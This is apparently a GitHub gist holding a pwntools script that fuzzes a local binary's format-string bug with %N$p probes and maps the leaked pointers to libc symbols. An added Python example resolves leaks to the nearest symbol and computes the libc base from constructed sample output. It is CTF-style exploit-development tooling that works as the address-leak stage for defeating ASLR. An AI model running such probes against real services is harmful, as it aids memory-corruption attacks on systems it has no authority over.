@clubby789
Created September 4, 2020 23:03
Pwntools-based format string fuzzer
from pwn import *

context.arch = "amd64"  # Change as applicable
e = ELF("./format")     # Binary name
p = process(e.path)
libc = p.libc  # Load libc, initialised with its runtime base (needs a dynamically linked target)
# Flip sym:addr dict so a leaked address can be looked up by symbol name
# (aliases that share an address keep whichever name was seen last)
rev = {value: key for (key, value) in libc.sym.items()}

def exec_fmt(pl):
    p.sendline(pl)
    return p.clean()  # short default timeout; raise it if leaks come back empty

# Assumes process loops forever; you'll need to spawn a new process
# in this loop if you only get a few leaks
for x in range(1, 100):  # positional arguments start at %1$
    # Leak pointer at offset x
    leak = exec_fmt(f'%{x}$p').strip()
    try:
        addr = int(leak, 16)
    except ValueError:
        continue  # "(nil)" or non-pointer output: nothing to resolve
    # Print the leak, with the matching libc symbol if found
    print(f"%{x}$p : {hex(addr)} - {rev.get(addr, '?')}")
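The gist resolves a leak only when it lands exactly on a symbol start, but the pointers that a format string exposes are usually return addresses into the middle of a function (for example `__libc_start_main+0x80`), so an exact `rev[addr]` lookup misses them, and when two names alias one address the flipped dict keeps whichever name pwntools yielded last. The following is an added example, not part of the gist, showing the resolution step done offline: it parses the raw probe output (including `(nil)` and garbage), finds the nearest preceding symbol with a bisect, and recovers the libc base from the hit. The symbol offsets, the base `0x7f1234567000` and the probe outputs in `SAMPLE_PROBES` are all constructed for the example and are not real libc values; with pwntools you would feed it `p.libc.sym` and `exec_fmt` output instead.

```python
import bisect

# Hypothetical libc symbol file offsets (what ELF("libc.so.6").sym holds before a base
# is set). Constructed for this example; not real libc values.
LIBC_OFFSETS = {
    "__libc_start_main": 0x29d10,
    "system":            0x50d70,
    "printf":            0x60770,
    "puts":              0x80ed0,
    "_IO_puts":          0x80ed0,   # alias: same address as puts
}

# Constructed runtime base for the example; pwntools' p.libc discovers the real one.
SAMPLE_BASE = 0x7f1234567000

def runtime_syms(base, offsets=LIBC_OFFSETS):
    """Rebase a symbol table, mirroring what setting ELF.address does in pwntools."""
    return {name: base + off for name, off in offsets.items()}

def parse_leak(raw):
    """Convert the bytes a %N$p probe returns into an int; None for non-pointers."""
    text = raw.decode(errors="replace") if isinstance(raw, bytes) else raw
    text = text.strip()
    if text in ("", "(nil)"):
        return None
    try:
        return int(text, 16)
    except ValueError:
        return None

class SymbolResolver:
    """Nearest-preceding-symbol lookup, so leaks into a function body still resolve."""
    def __init__(self, syms):
        self._names = {}
        for name, addr in syms.items():
            self._names.setdefault(addr, name)   # keep the first name for aliased addresses
        self._addrs = sorted(self._names)

    def resolve(self, addr, max_dist=0x1000):
        """Return (symbol, delta) for the closest symbol at or before addr, else None."""
        i = bisect.bisect_right(self._addrs, addr) - 1
        if i < 0:
            return None
        start = self._addrs[i]
        if addr - start > max_dist:          # too far past any symbol: not a libc pointer
            return None
        return self._names[start], addr - start

def libc_base_from_leak(addr, resolver, offsets=LIBC_OFFSETS):
    """Recover the libc base from a leaked pointer: leak - delta - symbol file offset."""
    hit = resolver.resolve(addr)
    if hit is None:
        return None
    name, delta = hit
    return addr - delta - offsets[name]

def scan_leaks(probe_output, resolver):
    """probe_output maps a format-string offset to the raw bytes its %offset$p probe returned.
    Returns [(offset, addr, symbol_or_None, delta)] for every entry that parsed as a pointer."""
    results = []
    for off in sorted(probe_output):
        addr = parse_leak(probe_output[off])
        if addr is None:
            continue
        hit = resolver.resolve(addr)
        results.append((off, addr) + (hit if hit else (None, 0)))
    return results

# Constructed sample of probe output (not captured from a real target)
SAMPLE_PROBES = {
    1: b"0x7ffd12345678",                           # stack pointer, not in libc
    2: b"(nil)",
    3: hex(SAMPLE_BASE + 0x29d10 + 0x80).encode(),  # return address into __libc_start_main+0x80
    4: b"0x25207024",                               # bytes of our own format string on the stack
    5: hex(SAMPLE_BASE + 0x80ed0).encode(),         # exact address of puts
    6: b"garbage",
}

if __name__ == "__main__":
    resolver = SymbolResolver(runtime_syms(SAMPLE_BASE))
    for off, addr, sym, delta in scan_leaks(SAMPLE_PROBES, resolver):
        tag = f"{sym}+{delta:#x}" if sym else "?"
        base = libc_base_from_leak(addr, resolver)
        suffix = f" (libc base {base:#x})" if base else ""
        print(f"%{off}$p : {addr:#x} - {tag}{suffix}")
```

`max_dist` is a sanity bound: a stack or heap pointer that happens to sit above the last libc symbol would otherwise "resolve" with an enormous delta. Tighten it if your libc has large gaps between exported symbols, or widen it when the leak points deep into a function such as `__libc_start_call_main`.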